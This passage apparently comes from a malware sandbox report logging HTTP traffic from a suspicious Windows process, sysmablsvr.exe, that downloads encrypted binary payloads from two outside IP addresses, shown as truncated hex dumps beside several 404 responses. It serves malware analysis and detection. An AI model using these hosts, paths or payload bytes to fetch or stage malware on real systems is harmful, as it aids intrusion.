                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:11:17.859571934 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:17 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 12544
                                            Last-Modified: Tue, 17 Sep 2024 16:30:32 GMT
                                            Connection: keep-alive
                                            ETag: "66e9aea8-3100"
                                            Accept-Ranges: bytes
                                            Data Raw: 2a 4b d4 2b 46 6e f7 a8 df 7f b7 00 68 d9 6f f3 b4 ef 0d e8 97 2d 1e 10 47 e5 8f 0d b4 e3 91 12 22 5c 1a ce ee 79 08 99 08 ca 96 c6 60 29 56 61 47 7b 2e 57 2c 4a f6 47 4b 3d 49 ec 3f b3 4a b8 c7 e1 ea 4d 42 4c b9 7e 2b fa 7e ba 1a 5e 3e 5b 39 18 5a 84 0e cb f3 93 bc d6 dc 0f 09 55 06 f9 3e 71 57 1f 01 56 32 cd 1b d1 0c 37 c7 0c 7f b5 17 fc 53 75 5f 46 b5 04 b3 70 02 25 2b 93 ee f2 66 57 1d 3f 9a 83 79 83 c7 a4 c9 c6 68 ac 15 9f 47 6b ae 5c 53 20 bf 7c 08 1b 7b 8e 9c ae c5 4f 9f 2f 84 a3 af c9 55 b3 81 69 62 8c a7 ad 5b 6d 48 f6 01 10 bc 78 4f 7c fe d8 7c 3d dc 7d 19 95 05 f0 93 20 e1 25 af 70 be 36 d4 ec 8e c8 49 65 21 99 24 c5 12 b4 46 90 fe aa e8 6c fa 8e 4e fc da cd 1e 04 3a a3 8a 62 6c 3f 6c fe a0 2c b1 16 1a b3 76 46 7d c9 b4 8e a6 3e f9 64 f0 d2 6c 20 bd c4 b1 38 37 d9 9b 49 c8 88 58 c3 32 b0 a2 f6 a0 63 74 49 42 e1 90 d7 39 c4 a3 fb 41 b9 99 62 87 d8 8d 66 39 91 75 ba d7 69 15 0e b0 8c 31 bf 70 fc c0 36 7b 50 13 2c 53 9d 7d 88 30 3f b3 36 95 c6 c0 b7 ca 56 07 02 88 2a ad 2e ad 94 c4 d0 db 3a [TRUNCATED]
                                            Data Ascii: *K+Fnho-G"\y`)VaG{.W,JGK=I?JMBL~+~^>[9ZU>qWV27Su_Fp%+fW?yhGk\S |{O/Uib[mHxO||=} %p6Ie!$FlN:bl?l,vF}>dl 87IX2ctIB9Abf9ui1p6{P,S}0?6V*.:?.`&T,Fb)PhcX1%UFgKX::=Wg*6R1)y5j[AQ&5LaJ)QD'@X+X-{j ^p[]>LeWI|$ICiwd@g&,C\cXbW_IWx0 ufHlij~PFA4TKD!zV[VNV}$6Jp[<|"Hfm$d9o=x 3j6Wk12LAyL=}IABtckwuq{W2w8y9cd!dSl(?,`)i^H(x|0?C~DUK:tMCr;d|lYie9+X||_#cc2N>a!q'oD==b^aR9=zf*PIQInkWZxB#bS_Y^2*Z&"T?~D~O
                                            Sep 17, 2024 23:11:17.859657049 CEST1236INData Raw: 21 22 e3 3a f8 64 ed d3 d6 31 f1 21 9f b6 49 60 d1 75 52 5e ed 96 2c 17 37 72 75 59 0c 38 aa 2c 14 89 b2 94 d9 b1 c4 bd cb 69 56 13 c2 e6 c2 4e 94 42 4c ab a8 13 37 df f1 30 27 8c df 4b 21 83 34 e8 67 0f 49 3f 73 b3 69 87 e4 53 75 2d 56 b7 3f e5
                                            Data Ascii: !":d1!I`uR^,7ruY8,iVNBL70'K!4gI?siSu-V?e2^(+#;,x{NsU{/>=NOcqHh6mzy~U;)/K</|{.f'O,,<=UjE-mJ,),FTuj0}YGHAWZm`%
                                            Sep 17, 2024 23:11:17.859673023 CEST1236INData Raw: 8c 7b d2 94 10 81 50 02 1b f8 df 9c 7f 20 a6 79 88 80 16 5a 89 90 19 d2 e1 21 c1 03 6c bf ad d8 ca 8d 65 26 17 dd 85 b6 e9 74 10 0a 32 72 30 5e 5e 67 6f d9 b8 a2 0f ab d9 01 62 52 0b 22 28 1c dd ba 4f 78 04 0a 46 20 b2 6c 00 d2 ad 9b 5c 62 8b 2f
                                            Data Ascii: {P yZ!le&t2r0^^gobR"(OxF l\b/{X$5vNXE!`FLNcS^)lQ l-Ts}R;$9DT?b(UGnw,";f+Q6vJ?U<6AQtn\&*8~/bUuq8
                                            Sep 17, 2024 23:11:17.859930992 CEST1236INData Raw: ec 6d 0b 68 66 0c c2 5d 9d 2a ae 94 6f df 44 73 f6 1d c9 bb 43 46 5c a8 84 41 08 ae 20 cd 6a b7 f1 a1 ad f4 8f cd 30 2e 38 77 b2 97 65 2d a5 44 ec b4 3b 2b 85 ef 49 41 9f 20 4c e0 76 6d d2 4d 78 9f b7 09 ee 55 58 52 90 1c 29 02 5a a8 4d 8b bc 8a
                                            Data Ascii: mhf]*oDsCF\A j0.8we-D;+IA LvmMxUXR)ZMDBY[A1dG5!j|Gb&v2]G\BspIQqTi3&ys?ok`Y{5*Va'NX^~s/.^[o3(]G9F]cPIT\+2n^a(`
                                            Sep 17, 2024 23:11:17.859945059 CEST1236INData Raw: 10 0d 0b b9 5f 9d 6d e6 92 57 24 32 d1 17 e9 b2 d9 ae 0d 71 a1 d0 f5 93 db 74 24 44 1d 9c e2 88 95 42 43 e3 6d 72 fc 78 0b 0c 45 d3 b3 36 15 f1 98 ab 5f 59 68 bb c4 59 ff aa da 7d a2 ad c0 0d 7b 82 2d 3b 08 0f 12 be 08 9a 06 81 47 b2 42 9b 80 69
                                            Data Ascii: _mW$2qt$DBCmrxE6_YhY}{-;GBiuMPyVE=hEN+kq?<'e>4bcb7Ki<=b"x5V$)VO$&<B0^MgOFzgQTfHO_T1*6vX
                                            Sep 17, 2024 23:11:17.859960079 CEST1236INData Raw: 8a 04 bc 40 2f 0c e0 a9 d6 0a e2 f7 14 8f ae 57 56 3d 2a bf 40 a3 25 fe 65 17 b7 f6 2f da 29 64 e9 6d 89 dc fd a5 6c 7b b4 e5 b8 72 df 7e 9d 10 04 92 d4 19 f1 8d 30 01 70 8c 1d 49 81 05 99 27 00 4f 7d 7a 9d c1 12 6d da 6c 5e f7 bb 5a cd 3d cf 8c
                                            Data Ascii: @/WV=*@%e/)dml{r~0pI'O}zml^Z=ksq#t]ID4CX<Vq/P:_NwB)xJkGC~ua"5I5nKy+Y{?bCI%Xm01:._&u>}@_`T
                                            Sep 17, 2024 23:11:17.859975100 CEST1236INData Raw: 30 57 86 af d6 c6 d3 34 95 3c 80 7e d4 8e 1c 90 01 dd 15 ca 71 10 9c 00 3b 53 0d 8c 64 86 20 42 75 94 c9 97 a4 ac 14 92 66 db cc e6 0b 41 93 bc 48 e3 00 cf 52 69 31 9b 26 f3 80 24 67 53 5d 3c 93 84 ba bb 51 1f 7e 2a d4 23 20 45 21 36 94 89 af 9c
                                            Data Ascii: 0W4<~q;Sd BufAHRi1&$gS]<Q~*# E!6:0x[EP-Xn\fv$4X,.YR:Ev%o)p k WkB6eCt@R`}2WP`YJM$3z?5\ JPql
                                            Sep 17, 2024 23:11:17.860306978 CEST1236INData Raw: f9 22 9d 01 2b fd 11 5a 19 b7 74 3c 7d 58 9a d4 0d e0 14 a2 0d 47 fd c5 51 f2 b7 9a f7 48 65 ed 09 41 ba 81 e1 6c bb df 4d 7f 56 a2 00 f2 66 ff a8 c5 e0 fc 39 3a bc e6 d4 2e fd 2b c0 af c0 29 76 67 bd f2 ec 0e 7c 1d da eb 7b fd b7 62 3a b7 39 f1
                                            Data Ascii: "+Zt<}XGQHeAlMVf9:.+)vg|{b:9&&Qn1MW.Ob+am9W-@;fG@cP=YxuF HH;,TTu,zmDU'?lCk=Sbi@iK\eDw"wV
                                            Sep 17, 2024 23:11:17.860323906 CEST1236INData Raw: 8c c8 46 fd 7c b3 b9 a1 94 a6 7b 4b c1 71 aa e7 a4 be 30 e5 5f 0e 05 16 bc 74 a8 2d 5c 2f 95 72 38 4e e1 76 31 86 be b0 b9 4d c9 83 64 b1 2d 19 3d 98 16 3b 2f 0b ec e9 18 da 39 a9 18 f7 a4 82 1f a4 33 02 ce 29 81 12 bd c3 f7 91 1b 26 27 d1 55 5c
                                            Data Ascii: F|{Kq0_t-\/r8Nv1Md-=;/93)&'U\]JvjS*g4!]ReebGCh+;`4TO{ZVj{726Vij&)q C*(*N|3q.C2&_JcQqGnwR
                                            Sep 17, 2024 23:11:17.860338926 CEST1236INData Raw: 18 3e a6 e8 85 bc a6 54 db 4a 14 bc ac 5a 13 7e 50 e4 f7 f8 90 7e 8e c4 4e d6 4a 50 6c 97 a3 82 31 ec 59 be 4c 6f 38 62 b9 d7 4e 68 c4 e0 fb 81 94 96 eb 34 f8 ef 65 4d 72 0c e4 72 b0 61 ad 02 27 c5 b1 82 5c 94 03 fd 50 45 43 36 7b e0 0c a7 45 e4
                                            Data Ascii: >TJZ~P~NJPl1YLo8bNh4eMrra'\PEC6{E\?&SgIqzEfMCz1U74;B3Q&maoMkjyt'K1H(,TNK#/S|eQ2/f[C]A-Z&QQ>RuvF&0
                                            Sep 17, 2024 23:11:17.864559889 CEST449INData Raw: 27 ce c4 b5 6b ea 96 54 3d fe 4f 4d 3d 18 9a a1 b4 15 32 01 38 10 4e b7 4b ed fb 49 c1 d8 b2 5d 08 75 1d 81 79 d8 fa b0 b2 98 90 35 9e 31 36 5f 4e 44 ef 33 04 01 c4 0a 90 70 41 47 fe 67 04 e6 85 b5 53 5f db c8 6e c0 79 b3 52 d8 7e 01 47 5e d2 91
                                            Data Ascii: 'kT=OM=28NKI]uy516_ND3pAGgS_nyR~G^{43e^W-qMw[~PA)LW!^LczVym_ZAVcYoZx%$[_j2\u\wch~;[E5}uiIj^A


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            31192.168.2.44978591.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:23.975404978 CEST166OUTGET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:11:24.665081978 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:24 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 7936
                                            Last-Modified: Wed, 11 Sep 2024 10:30:26 GMT
                                            Connection: keep-alive
                                            ETag: "66e17142-1f00"
                                            Accept-Ranges: bytes
                                            Data Raw: 2e 7e f0 5e 84 6b f0 eb 96 ea 4a 6a d8 5c 77 e1 0b 06 58 4d 99 2c 1c 04 2f ab f2 50 5c 0c 95 19 8b 0a b6 9e 12 c0 c5 a8 d5 56 11 38 8f 5a 61 6f 19 90 c7 21 70 7f ee 82 f6 69 81 73 e3 fe da 22 ae 77 39 00 16 34 6f 1a 91 a1 f1 d0 db 37 76 be 4b 27 f1 36 32 8d 2e fd 5e cf b1 00 eb 4b 72 16 21 fd 5c af 45 41 d6 dc 46 a7 a7 e4 45 2e 69 9b 06 a3 32 f4 2b 33 80 bb af 3b f3 5f ad 27 90 a3 00 e9 46 fd 3c 04 0e c1 67 84 7e 9c 01 83 74 da e3 d2 f0 ab 40 1c 53 24 d1 7c 12 d9 02 5e fb a8 0e 2f 33 2d 18 4d 12 2a 24 2d d6 3a 4f 0d 0a 00 b1 76 b9 36 1d 63 79 91 40 ae ce 13 9c d5 a6 70 91 ba 2d cc fb 81 2c 3a 62 fc 77 e1 a0 26 41 29 95 b0 01 1f b1 1e cc 7d fe 6e 33 68 b8 ad 89 e6 44 48 3e c9 67 be 8e 5f c5 22 f6 97 b0 e0 6b ec a6 b0 ca 48 a4 be 6a f0 74 98 ba 90 11 74 b3 2f 03 da 20 16 56 df e7 78 73 60 c7 81 c6 06 ee 5c ff fa 65 60 8b d1 30 e8 2e 41 f1 b3 e8 20 39 24 a6 dd 9d 32 8f ed 28 25 51 fe 08 50 97 5b ca a9 8a e9 8d 34 8c 38 5d 8d 79 3d 26 ab cb 83 d5 9b 9d a9 20 d6 17 ed 94 d9 df cd 3b 61 02 b3 45 55 c0 de [TRUNCATED]
                                            Data Ascii: .~^kJj\wXM,/P\V8Zao!pis"w94o7vK'62.^Kr!\EAFE.i2+3;_'F<g~t@S$|^/3-M*$-:Ov6cy@p-,:bw&A)}n3hDH>g_"kHjtt/ Vxs`\e`0.A 9$2(%QP[48]y=& ;aEUzrgRGX{Hi|IUeR9.!HJYCou=3_wev,qbsbT9BX'F,DnBoiYSgDzp.IA+V.QcRhXu>N![2V]pLXe%kYR#rOBoRust[cJv6|+$kv:?c8jO)~m><X`Vk,.d+z})P|~h?n)W,H;]6~}RZ_Zjx"~?mkV";G`mN$+_R~lwR!LoQ_gzfg6:FfvJr-t`i;w$K\P9!jtErORbT|[`WK^&bO50omvD0w:]CLW
                                            Sep 17, 2024 23:11:24.665101051 CEST1236INData Raw: a4 17 e7 bb 21 6c dd 35 58 41 57 e9 a9 92 ec 85 6f 50 16 1e 1c 67 80 62 32 9a 78 28 be 5d c5 c2 07 8f 75 83 8b 99 bf 65 68 45 29 25 90 da 08 b9 0f f3 5c a8 1f ff 5b 9b a1 ea bc e2 dd d8 8f 99 11 db 43 82 1b 7c 82 21 62 4b 2c cc d3 18 19 1e 3b 06
                                            Data Ascii: !l5XAWoPgb2x(]uehE)%\[C|!bK,;TSdr34S^sfN[8fob.4Zj=,lD<0jb<8epOLLTtcA7$V~M1o"hn8}-IEG;ukG(3~-%Ox
                                            Sep 17, 2024 23:11:24.665111065 CEST448INData Raw: ae 92 f8 4d f8 fb 4d 72 90 01 3c 84 3a 9a 7d a2 ea 6b de 64 5d a1 b8 a7 09 27 4b b0 22 83 60 80 73 64 ad 8e 6b b1 a8 01 f2 30 67 68 f3 6d 8d 2a 15 d0 0e e6 57 14 3d 80 12 31 6e cd d1 69 54 08 f5 57 0b d4 66 d7 14 1e d4 55 58 81 55 7b 60 87 47 dc
                                            Data Ascii: MMr<:}kd]'K"`sdk0ghm*W=1niTWfUXU{`GZgqd8n%{VF^[I;Q+6-/XAP>!-:@OAivkGs^'5D@6A`Z-Uk+7.+"eG1m-tq:9KkE@IUit )gq
                                            Sep 17, 2024 23:11:24.665119886 CEST1236INData Raw: ac 59 de df 6e 13 06 b8 5c 9a 78 ac b2 53 72 43 69 ac cd c4 cb 47 de 72 cc 56 e6 9e 87 39 b0 ab cd b2 57 79 3a 9b d3 d1 01 e4 e5 79 a1 51 c1 a8 66 40 02 f9 13 0b b4 ff f1 b8 99 e3 65 c9 97 69 94 b2 7a 33 e6 a5 40 31 7a ce 2a 7f 21 51 6b 03 45 3a
                                            Data Ascii: Yn\xSrCiGrV9Wy:yQf@eiz3@1z*!QkE:, eZtJR1l*Bn6q#8ie(I"Y">;[L1Bz'DT$38dV$`>%Fo{_};
                                            Sep 17, 2024 23:11:24.665131092 CEST1236INData Raw: e1 de 70 ff 56 b9 12 a5 92 6e 3f 01 d1 bb 22 c1 9e d7 d1 74 33 cc 3f 20 70 ae 02 21 c6 b2 a7 be 96 49 26 4b 08 82 f7 46 5c b6 2b 02 9c c5 3a 3d b6 0f a8 6f ce 19 fc 94 de e8 cc bc 2c 37 7a fb 9d cc cf c6 1e 9c aa 0d 0f c3 2b 03 0e 2a 1c 14 29 48
                                            Data Ascii: pVn?"t3? p!I&KF\+:=o,7z+*)H)ck4T?wMR1s+aFt?*ylCWt3%anG}y\ey}I/ff%Kv-P;}eaxMO[@lguu\-(uM+HbK!,
                                            Sep 17, 2024 23:11:24.665141106 CEST1236INData Raw: 97 7f dc da 9c ae c1 35 34 0b ad 5f f2 bd a9 7c 35 45 88 7f 0f 1e 4f 39 38 30 26 92 71 c8 5a f2 96 dc ba df 79 63 7c e5 29 86 14 f9 6c 38 58 71 47 42 64 20 1c da 14 92 57 e5 de 95 15 1e 59 3a fe 55 10 1d 64 ce 5d 7b 62 27 96 98 6c 8b e5 c6 4d e8
                                            Data Ascii: 54_|5EO980&qZyc|)l8XqGBd WY:Ud]{b'lMoQ{(Qh+M@0hp$=EC`ms%?wFf|J:&U8z~R{Q9nnjHDZObo&a4I#2j(^h~Hx;!B
                                            Sep 17, 2024 23:11:24.665152073 CEST1236INData Raw: 65 60 8a ac 29 c5 3e 9e 01 d0 31 66 70 f4 af da 68 2c 92 3d 6c 7c 8b d2 f9 2b b4 15 ff 77 e1 73 e0 d5 a1 6a 62 63 fd 66 64 32 a9 31 a1 95 81 c2 a7 3a 69 9c f2 e3 9e 94 49 9e 82 d3 b2 19 5c bf ab bf 8a 5f ca 4a 15 3f 50 5a b6 4e 63 66 91 9d 2c a1
                                            Data Ascii: e`)>1fph,=l|+wsjbcfd21:iI\_J?PZNcf,1tWQnd/q~+&r;2-fJ?&O{VXE;/2uW28|_-b3EmO!@lz1`gT(PsflB}5K&l
                                            Sep 17, 2024 23:11:24.665220022 CEST328INData Raw: cc 28 ca e8 03 bb d5 64 05 23 b6 ec 39 4e be 8a 3d 4f 02 9f 3f 12 85 65 42 13 56 d5 55 b7 0b 13 d2 f8 db 06 b5 d1 9f 16 dc 67 d8 91 fe 6d d1 13 14 ed b0 fe 3f 3c 1a 00 4e 6f 2b e2 3e 95 da 37 d9 21 51 5d ee 04 c8 7b 4c 6d 38 3c b3 5a fd f4 70 16
                                            Data Ascii: (d#9N=O?eBVUgm?<No+>7!Q]{Lm8<ZpYO^TyrjOyKKa7zG{1;{&c(-jU@OMH-R]KB$n#/Y#0Ku2ctmd1bI1@;m>


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            32192.168.2.44978691.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:26.714817047 CEST166OUTGET /3 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:11:27.404637098 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:27 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            33192.168.2.44978891.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:29.435178995 CEST166OUTGET /4 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:11:30.236568928 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:30 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            34192.168.2.44978991.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:32.277194023 CEST166OUTGET /5 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:11:33.049627066 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:32 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            35192.168.2.44979191.202.233.141806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:35.093247890 CEST166OUTGET /6 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 91.202.233.141
                                            Sep 17, 2024 23:11:35.895641088 CEST728INHTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:35 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            36192.168.2.449793185.215.113.66806768C:\Windows\sysmablsvr.exe
                                            TimestampBytes transferredDirectionData
                                            Sep 17, 2024 23:11:39.131509066 CEST166OUTGET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 185.215.113.66
                                            Sep 17, 2024 23:11:39.986016989 CEST1236INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:11:39 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 8200
                                            Last-Modified: Tue, 17 Sep 2024 21:10:46 GMT
                                            Connection: keep-alive
                                            ETag: "66e9f056-2008"
                                            Accept-Ranges: bytes
